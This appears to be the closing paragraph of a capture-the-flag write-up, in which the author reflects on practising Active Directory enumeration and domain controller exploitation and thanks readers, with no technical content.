I really enjoyed working through this room and getting the opportunity to learn more about exploiting an Active Directory domain controller. The challenge had a lot of enumeration, which helped me to sharpen my Active Directory enumeration skills. Thank you for reading till the end and keep hacking 😄!
